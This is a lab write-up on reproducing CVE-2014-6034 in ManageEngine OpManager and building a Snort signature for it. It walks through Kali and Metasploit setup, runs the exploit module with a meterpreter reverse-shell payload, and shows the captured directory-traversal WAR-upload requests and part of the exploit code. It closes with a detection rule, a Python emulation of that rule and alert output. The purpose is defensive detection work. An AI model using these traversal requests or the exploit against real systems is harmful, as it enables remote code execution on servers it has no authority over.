This article uses CVE-2014-6034 as a case study in vulnerability analysis and verification, covering every stage: environment setup, packet capture, and signature extraction and validation.
1. Download the software:
ManageEngine OpManager 9
URL: http://manageengine-opmanager.soft32.com/
Kali Linux
https://www.kali.org/downloads/
I downloaded the Kali Linux 64 bit ISO 1.0.9a.
2. Environment setup
ManageEngine OpManager 9 installs with a click-through installer. During installation it reports that the default listening port is 8060, so the application can be reached at a.b.c.d:8060.
Kali Linux needs to be installed in a virtual machine; VMware is recommended. Kali is a Debian-based distribution.
After installing Kali Linux, update the system as described below. If you are not running as root, prefix the commands with sudo.
The virtual machine and the machine running OpManager must be on the same network segment.
a. Update the package sources:
Edit the sources.list file:
leafpad /etc/apt/sources.list
Then add whichever of the following sources are fastest for you (pick freely; you do not need all of them):
# Official sources
deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
# Bleeding-edge sources; not recommended for beginners
deb http://repo.kali.org/kali kali-bleeding-edge main
deb-src http://repo.kali.org/kali kali-bleeding-edge main
# USTC Kali mirror
deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free
# Aliyun Kali mirror
deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib
deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free
After saving the file, run:
apt-get update        # refresh the package lists
apt-get dist-upgrade  # install the updates
b. Metasploit Framework setup
Following the Kali Linux network service policy, Kali does not start any network services automatically, including database services. A few steps are therefore needed to run Metasploit with database support.
Start Kali's PostgreSQL service: Metasploit uses PostgreSQL as its database, so it must be running first.
service postgresql start
You can confirm that PostgreSQL is running from the output of ss -ant, checking that port 5432 is in the LISTEN state.
State      Recv-Q Send-Q Local Address:Port   Peer Address:Port
LISTEN     0      128    :::22                :::*
LISTEN     0      128    *:22                 *:*
LISTEN     0      128    127.0.0.1:5432       *:*
LISTEN     0      128    ::1:5432             :::*
Start Kali's Metasploit service: with PostgreSQL up and running, the next step is to start the Metasploit service. On its first run the service creates a database user named msf3 and a database named msf3. It also starts the Metasploit RPC server and the web server it needs.
service metasploit start
Run msfconsole on Kali: now that both the PostgreSQL and Metasploit services are running, msfconsole can be started, and the db_status command verifies database connectivity.
msf > db_status
[*] postgresql connected to msf3
msf >
Configure Metasploit to start at boot: if you want PostgreSQL and Metasploit to start when the system boots, enable the services with update-rc.d.
update-rc.d postgresql enable
update-rc.d metasploit enable
A few commonly used Metasploit commands: search (search for exploit information and modules), use (select a module), show options (display the options the module requires), set [option] xx (set an option), exploit (launch the exploit).
3. Verification and packet capture:
Download the exploit script: from http://www.scap.org.cn/CVE-2014-6034.html follow the packetstorm link and download the .rb module file, upload it to the /usr/share/metasploit-framework/modules/exploits/windows/http directory, restart msfconsole, use the search command to find opmanager, then set the options and run the module.
msf exploit(opmanager_socialit_file_upload) > search opmanage

Matching Modules
================

   Name                                                 Disclosure Date  Rank       Description
   ----                                                 ---------------  ----       -----------
   exploit/windows/http/opmanager_socialit_file_upload  2014-09-27       excellent  ManageEngine OpManager / Social IT Arbitrary File Upload

msf exploit(opmanager_socialit_file_upload) > show options

Module options (exploit/windows/http/opmanager_socialit_file_upload):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    192.168.83.166   yes       The target address
   RPORT    8060             yes       The target port
   SLEEP    15               yes       Seconds to sleep while we wait for WAR deployment
   VHOST                     no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.83.175   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal

msf exploit(opmanager_socialit_file_upload) > exploit
4. The captured packets are as follows:
Packet 1:
POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=Uw71PQDsCqCtUDrcKJhv.war HTTP/1.1
Host: 192.168.83.166:8060
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/octet-stream
Content-Length: 6469
Packet 2:
POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/conf&FILENAME=context.xml HTTP/1.1
Host: 192.168.83.166:8060
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/xml
Content-Length: 125
<?xml version='1.0' encoding='utf-8'?><Context privileged="true"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>
From the exploit script it can be seen that if the first attempt does not succeed, the probe is repeated:
def exploit
  # Random name for the uploaded WAR application
  app_base = rand_text_alphanumeric(4 + rand(32 - 4))
  # First attempt: upload the WAR and request it
  upload_war_and_exec(false, app_base)
  register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war")
  sleep_counter = 0
  # Wait up to SLEEP seconds for a session to come back
  while not session_created?
    if sleep_counter == datastore['SLEEP']
      print_error("#{peer} - Failed to get a shell, let's try one more time")
      # Second attempt (this is the second request seen in the capture)
      upload_war_and_exec(true, app_base)
      return
    end
    sleep(1)
    sleep_counter += 1
  end
end
5. Snort signature extraction and verification
#flow:to_server,established;
alert tcp any any -> any 8060 (msg:"Directory traversal vulnerability in the com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector servlet in ZOHO ManageEngine OpManager 8.8 through 11.3, Social IT Plus 11.0, and IT360 10.4 and earlier allows remote attackers or remote authenticated users to write to and execute arbitrary WAR files via a .. (dot dot) in the regionID parameter."; content:"com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"; nocase; content:"FILENAME="; nocase; within:45; pcre:"/regionID=\.\./\.\./\.\./.*/i"; reference:cve,2014-6034; sid:1089; rev:1;)
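As an added example that is not part of the original write-up, the following Python script emulates the matching logic of the rule above (content with nocase, within:45 measured from the end of the previous content match, and the pcre) and runs it over the request lines from the two captured packets in section 4 plus one constructed benign request. The servlet name and the two captured request lines come from the page; the benign request, the function names and the within-semantics emulation are assumptions made for this example.

```python
import re

# Added example (not from the write-up): a minimal emulation of how the Snort
# rule sid:1089 evaluates its content/nocase/within/pcre options, so that the
# rule's acceptance and rejection behaviour can be checked on sample requests.

SERVLET = "com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"
# Equivalent of pcre:"/regionID=\.\./\.\./\.\./.*/i"
TRAVERSAL_RE = re.compile(r"regionID=\.\./\.\./\.\./.*", re.IGNORECASE)


def content_match(payload, pattern, start=0, within=None, nocase=True):
    """Emulate a Snort 'content' match.

    Searches for `pattern` in `payload` at or after offset `start` (the end of
    the previous content match). With `within`, the new match must end no more
    than `within` bytes after `start`, mirroring Snort's 'within' modifier.
    Returns the offset just past the match, or None when there is no match.
    """
    haystack = payload.lower() if nocase else payload
    needle = pattern.lower() if nocase else pattern
    idx = haystack.find(needle, start)
    if idx < 0:
        return None
    end = idx + len(needle)
    if within is not None and end - start > within:
        return None
    return end


def matches_sid_1089(payload):
    """Return True if the request payload would trigger the rule above."""
    end_servlet = content_match(payload, SERVLET)
    if end_servlet is None:
        return False
    # content:"FILENAME="; nocase; within:45  (relative to the servlet match)
    if content_match(payload, "FILENAME=", start=end_servlet, within=45) is None:
        return False
    # pcre:"/regionID=\.\./\.\./\.\./.*/i" is evaluated over the whole payload
    return TRAVERSAL_RE.search(payload) is not None


# Constructed sample payloads: the two request lines from the captured packets
# in section 4, and one benign request (assumed shape, not from a capture) used
# as a negative check.
SAMPLES = {
    "war_upload": (
        "POST /servlet/" + SERVLET +
        "?regionID=../../../tomcat/webapps&FILENAME=Uw71PQDsCqCtUDrcKJhv.war HTTP/1.1\r\n"
        "Host: 192.168.83.166:8060\r\n"
        "Content-Type: application/octet-stream\r\n\r\n"
    ),
    "context_xml": (
        "POST /servlet/" + SERVLET +
        "?regionID=../../../tomcat/conf&FILENAME=context.xml HTTP/1.1\r\n"
        "Host: 192.168.83.166:8060\r\n"
        "Content-Type: application/xml\r\n\r\n"
    ),
    "benign": (
        "POST /servlet/" + SERVLET +
        "?regionID=1&FILENAME=status.txt HTTP/1.1\r\n"
        "Host: 192.168.83.166:8060\r\n\r\n"
    ),
}


def evaluate_samples(samples=SAMPLES):
    """Run the rule emulation over every sample; returns {name: matched}."""
    return {name: matches_sid_1089(payload) for name, payload in samples.items()}


if __name__ == "__main__":
    for name, hit in evaluate_samples().items():
        print(f"{name:12s} -> {'ALERT' if hit else 'no alert'}")
```

Both captured requests trip all three conditions, while the benign request passes the two content checks but fails the pcre. Two things worth keeping in mind when tuning this rule: within:45 caps how far FILENAME= may appear after the servlet name, so the gap allowed between the two content matches is what makes the rule specific, and the flow:to_server,established option is commented out in the rule as written, so it will also fire on traffic that is not part of a tracked client-to-server session.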
6. Run Snort and check the alert output, which is as follows:
snort -r ../pkt/2014-6034_kalitowindows_exploit_succ_pkt_jyh_001.pcap -c snort.conf -l log/ -A console
01/08-20:53:18.917122 [**] [1:1089:1] Directory traversal vulnerability in the com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector servlet in ZOHO ManageEngine OpManager 8.8 through 11.3, Social IT Plus 11.0, and IT360 10.4 and earlier allows remote attackers or remote authenticated users to write to and execute arbitrary WAR files via a .. (dot dot) in the regionID parameter. [**] [Priority: 0] {TCP} 192.168.83.175:44845 -> 192.168.83.166:8060